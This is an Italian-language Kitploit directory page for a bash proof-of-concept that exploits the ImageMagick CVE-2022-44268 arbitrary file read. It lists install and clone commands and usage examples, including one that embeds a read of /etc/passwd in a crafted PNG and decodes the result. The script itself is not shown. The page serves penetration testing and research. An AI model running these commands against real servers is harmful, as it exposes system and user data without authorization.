Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ImageMagick-CVE-2022-44268-PoC — Uno script bash per sfruttare facilmente la vulnerabilità di lettura arbitraria dei file di ImageMagick CVE-2022-44268 | Kitploit
Strumenti/GitHubGitHub/atici/imagemagick-cve-2022-44268-poc
Analisi delle VulnerabilitàExploitEsfiltrazione DatiRaccolta InformazioniPenetration TestingSviluppo Payload
GitHubatici/imagemagick-cve-2022-44268-poc

ImageMagick-CVE-2022-44268-PoC

Uno script bash per sfruttare facilmente la vulnerabilità di lettura arbitraria dei file di ImageMagick CVE-2022-44268

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
20 giorni faNon ancora revisionato

ImageMagick-CVE-2022-44268-PoC

Uno script bash per sfruttare facilmente la vulnerabilità di lettura arbitraria dei file di ImageMagick CVE-2022-44268

Versione di ImageMagick interessata

root@kitploit:~
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP(4.5)
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib

Pacchetti da installare

root@kitploit:~
sudo apt-get install imagemagick exiftool pngcrush exiv2 -y

Configurazione

root@kitploit:~
git clone https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268.git
cd Exploit-for-ImageMagick-CVE-2022-44268
chmod 750 script.sh

Utilizzo

root@kitploit:~
./script.sh -p [Path to Read] [PNG Image] [Output[Optional, if not used defaults to pngout.png]]
./script.sh -d [PNG]

Examples
./script.sh -p /etc/passwd sample.png output.png
./script.sh -d pngout.png

Options
-h = Show help
-p = Add the exploit to a PNG image 
-d = Extract and decode the read file

Crediti

  • Report originale: https://www.metabaseq.com/imagemagick-zero-days/
  • PoC originale : https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC.git
  • Ispirazione per questo progetto : https://github.com/Ashifcoder/CVE-2022-44268-automated-poc

Disclaimer:

Tutto il codice fornito in questo repository è solo a scopo educativo/di ricerca. Qualsiasi azione e/o attività relativa al materiale contenuto in questo repository è di esclusiva responsabilità dell'utente. L'uso improprio del codice in questo repository può comportare azioni penali nei confronti delle persone coinvolte. L'autore non sarà ritenuto responsabile nel caso in cui vengano intentate azioni penali contro individui che utilizzano impropriamente il codice in questo repository per violare la legge.

Scarica lo strumento